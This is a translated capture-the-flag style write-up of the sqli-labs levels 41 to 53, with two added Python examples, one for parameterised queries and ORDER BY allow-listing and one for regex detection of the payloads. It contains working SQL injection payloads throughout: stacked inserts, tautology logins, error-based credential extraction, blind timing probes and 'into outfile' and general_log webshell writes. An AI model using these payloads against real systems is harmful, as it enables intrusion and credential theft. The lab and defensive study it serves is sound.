sqlilab-Less-41-53-writeup

Less-41 Stacked query injection, integer, no echo

This level is the same as Less-39, except that nothing is echoed back.

?id=1;insert into users(username,password) values ('bmf9998','shit');

?id=1;set global general_log = "ON";set global general_log_file='/var/www/html/Less-41/shell.php';--+

Less-42 Stacked query injection, POST request, error shown

Because the password field in this level is not filtered, it can be passed with a universal password (tautology), the usual error-based injection, or UNION-based injection; it also supports second-order injection as in Less-24. The purpose of this level is to exercise stacked queries in a POST request.

Error-based injection

POST /Less-42/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-42/index.php
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 253

login_user=admin&login_password=bmfx ' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#&mysubmit=Login

Universal-password login via the password field
shit' or 998#

Stacked query injection

POST /Less-42/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-42/index.php
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 121

login_user=admin&login_password=bmfx'; insert into users(username,password) values ('bmfd998998','shit');#&mysubmit=Login

I will not demonstrate the other variants; they all work from the password field.

Less-43 Stacked query injection, POST request, error shown, with parentheses

This level is the same as Less-42: the password field is unfiltered, only the closing sequence has a parenthesis added.

Error-based injection

POST /Less-43/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-43/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 252

login_user=admin&login_password=bmfx') AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#&mysubmit=Login

Universal-password login
shit') or 998#

Stacked query injection

POST /Less-43/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-43/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 121

login_user=admin&login_password=bmfx'); insert into users(username,password) values ('bmfd77878','shit');#&mysubmit=Login

Less-44 Stacked query injection, POST request, blind

This level is the same as Less-43 but without error-based injection.

Stacked query injection

POST /Less-44/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-44/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 119

login_user=admin&login_password=bmfx';insert into users(username,password) values ('bmfx44333','shit');#&mysubmit=Login

Less-45 Stacked query injection, POST request, blind, with parentheses

This level uses the same closing sequence as Less-43 but has no error-based injection.

Stacked query injection

POST /Less-45/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-45/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

login_user=admin&login_password=bmfx'); insert into users(username,password) values ('bmfx0925','shit');#&mysubmit=Login

Less-46 ORDER BY injection, error shown

Ways to verify

Ascending and descending
Ascending: ?sort=1 asc shows the records sorted, output normal
Descending: ?sort=1 dasc shows an abnormal error

rand() check

?sort=rand(true)
?sort=rand(false)
Both of the above execute successfully, and the results for true and false differ.

Or:
?sort=rand()  random order, different on every request
?sort=1 and rand()  shown once, then the same on every request
Use the difference between these two to confirm the injection.

Time-delay check

?sort=sleep(1)
?sort=(sleep(1))
?sort=1 and sleep(1)
When I tested this it easily hung the database; the likely reason is that the delay is (number of rows * 1) seconds: the payload says 1 second, but if the table holds many rows the total wait becomes very long.

Error-based injection

updatexml method
?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23

Regular SQL query
?sort=1+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

procedure analyse method
?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)

Boolean-based blind injection

?sort=rand(left(database(),1)>'r')
?sort=rand(left(database(),1)>'s')

Time-based blind injection

?sort=rand(if(ascii(substr(database(),1,1))>114,1,sleep(1)))
?sort=rand(if(ascii(substr(database(),1,1))>115,1,sleep(1)))

Writing a file with into outfile

?sort=1 into outfile "/var/www/html/Less-46/less46.txt"

Getting a shell by writing a file

?sort=1 into outfile "/var/www/html/Less-46/less46.php" lines terminated by 0x3c3f70687020706870696e666f28293b3f3e
The 3c3f70687020706870696e666f28293b3f3e above is the hex encoding of <?php phpinfo();?>

Online converter: https://www.bejson.com/convert/ox2str/

Less-47 ORDER BY injection, error shown, single quote

Same injection approach as Less-46, only with a single quote added.

Error-based injection

updatexml method
?sort=1' and updatexml(1,concat(0x7e,(select version()),0x7e),1) %23

Regular query injection
?sort=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

procedure analyse method
?sort=1' procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)--+

Less-48 ORDER BY single-quote error injection, blind

This level is the same as Less-46, except that it is blind, so error-based injection cannot be used.

?sort=1 into outfile "/var/www/html/Less-48/less48.txt"

Less-49 ORDER BY single-quote error injection, blind

Same as Less-46; error-based injection cannot be used.

Write a file
?sort=1' into outfile "/var/www/html/Less-49/less49.txt"

Time-delay injection
?sort=' rand(if(ascii(substr(database(),1,1))=115,1,sleep(10)))

Less-50 ORDER BY injection, integer

This level is the same as Less-46, but the original mysql_query call has been changed to mysqli_multi_query, so stacked injection is supported; see Less-38 for stacked injection.

?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23
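For comparison with the mysqli_multi_query change just described and with the ORDER BY levels, here is an added example (not from the original writeup or from sqli-labs) of the two server-side fixes a defender applies: the value from a request is validated and bound through a single-statement API, and ?sort= is resolved through an allow-list, because ORDER BY cannot take a bound parameter. It uses an in-memory SQLite table as a constructed stand-in for the users table; the schema, seed rows and the SORT_COLUMNS map are assumptions, and the stacked payload is the one from the Less-41 request above.

```python
import sqlite3

# Constructed in-memory stand-in for the sqli-labs users table (not the project's code).
SCHEMA = "CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
SEED = [("Dumb", "Dumb"), ("admin", "admin")]
# ORDER BY cannot take a bound parameter, so ?sort= is resolved through a fixed map (Less-46 to 53).
SORT_COLUMNS = {"1": "id", "2": "username", "3": "password"}

def build_order_by(sort_param: str):
    # Returns a fixed fragment for "<key>" or "<key> asc|desc", else None (reject with 400);
    # sleep(), rand(), quotes and comments never reach the SQL text.
    parts = sort_param.strip().lower().split()
    if len(parts) not in (1, 2) or parts[0] not in SORT_COLUMNS:
        return None
    direction = parts[1] if len(parts) == 2 else "asc"
    if direction not in ("asc", "desc"):
        return None
    return f"ORDER BY {SORT_COLUMNS[parts[0]]} {direction}"

def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO users(username, password) VALUES (?, ?)", SEED)
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, id_param: str) -> None:
    # Concatenated SQL fed to a multi-statement API: the mysqli_multi_query shape of Less-50.
    conn.executescript(f"SELECT username FROM users WHERE id={id_param}")

def lookup_safe(conn: sqlite3.Connection, id_param: str):
    # Validate the type, then bind: the value stays data and exactly one statement runs.
    if not id_param.isdigit():
        raise ValueError("id must be an integer")
    row = conn.execute("SELECT username FROM users WHERE id=?", (int(id_param),)).fetchone()
    return row[0] if row else None

def user_count(conn: sqlite3.Connection) -> int:
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]

def demo() -> tuple:
    stacked = "1;insert into users(username,password) values ('bmf9998','shit');"  # Less-41 payload
    vuln, safe = fresh_db(), fresh_db()
    lookup_vulnerable(vuln, stacked)               # the second statement inserts a row
    try:
        lookup_safe(safe, stacked)
        rejected = False
    except ValueError:
        rejected = True
    return user_count(vuln), user_count(safe), rejected   # (3, 2, True)
```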

Less-51 ORDER BY injection, single quote

Same as Less-50, except that a single quote is needed to close the string.

?sort=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23

Less-52 ORDER BY injection, blind, integer

Same situation as Less-50 minus error-based injection; boolean-based and time-based blind injection can be used.

?sort=rand(if(ascii(substr(database(),1,1))>114,1,sleep(1)))
?sort=rand(if(ascii(substr(database(),1,1))>115,1,sleep(1)))

?sort=1 and if(length(database())=8,sleep(5),0) --+

Less-53 ORDER BY injection, blind, single quote

?sort=4' and if(length(database()) = 8 ,0,sleep(6)) --+
?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
?sort=1' and (ascii(substr((select database()) ,1,1))) = 114 and if(1=1, sleep(1), null) and '1'='1
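As an added example that is not part of the original post, the following signature scan tags the payload shapes used across Less-41 to Less-53 (stacked statements, into outfile writes, updatexml/floor(rand()) errors, sleep() timing, rand()-based boolean probes and tautologies) in a request's query string or form body, so they can be alerted on at a WAF or when reviewing access logs. The SIGNATURES patterns, the tag names and the SAMPLES list built from this page's payloads are all constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Signature groups for the payload shapes in this writeup (stacked queries, file writes,
# error-, time- and boolean-based probes). Matched against the decoded, lower-cased value.
SIGNATURES = {
    "stacked_query": re.compile(r";\s*(insert|update|delete|drop|set\s+global)\b"),
    "file_write": re.compile(r"\binto\s+(out|dump)file\b"),
    "error_based": re.compile(r"\b(updatexml|extractvalue)\s*\(|floor\s*\(\s*rand\s*\(\s*0\s*\)"
                              r"\s*\*\s*2\s*\)|procedure\s+analyse"),
    "time_based": re.compile(r"\bsleep\s*\("),   # even sleep(1) matters: ORDER BY runs it per row
    "boolean_probe": re.compile(r"\brand\s*\((true|false|.*[<>=])"),
    "tautology": re.compile(r"'\)?\s*or\s+\S+\s*(#|--|$)"),
    "comment_tail": re.compile(r"(--\s|#)\s*$"),
}

def normalise(value: str) -> str:
    # Decode twice: a proxy or log exporter frequently percent-encodes the value once more.
    return unquote_plus(unquote_plus(value)).lower()

def classify(value: str) -> set:
    text = normalise(value)
    return {name for name, rx in SIGNATURES.items() if rx.search(text)}

def scan_params(qs: str) -> dict:
    # Works for both a GET query string and an x-www-form-urlencoded POST body.
    findings = {}
    for pair in qs.lstrip("?").split("&"):
        key, _, value = pair.partition("=")
        tags = classify(value)
        if tags:
            findings[key] = tags
    return findings

# Constructed request samples taken from the payloads shown in this writeup.
SAMPLES = [
    "?sort=1 asc",
    "?id=1;set global general_log = \"ON\";set global general_log_file='/var/www/html/Less-41/shell.php';--+",
    "login_user=admin&login_password=bmfx'; insert into users(username,password) values ('bmfd998998','shit');#&mysubmit=Login",
    "?sort=1 into outfile \"/var/www/html/Less-46/less46.txt\"",
    "?sort=rand(if(ascii(substr(database(),1,1))>114,1,sleep(1)))",
    "?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23",
]

def demo() -> list:
    return [scan_params(s) for s in SAMPLES]
```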

Original source: https://www.cnblogs.com/autopwn/p/13730125.html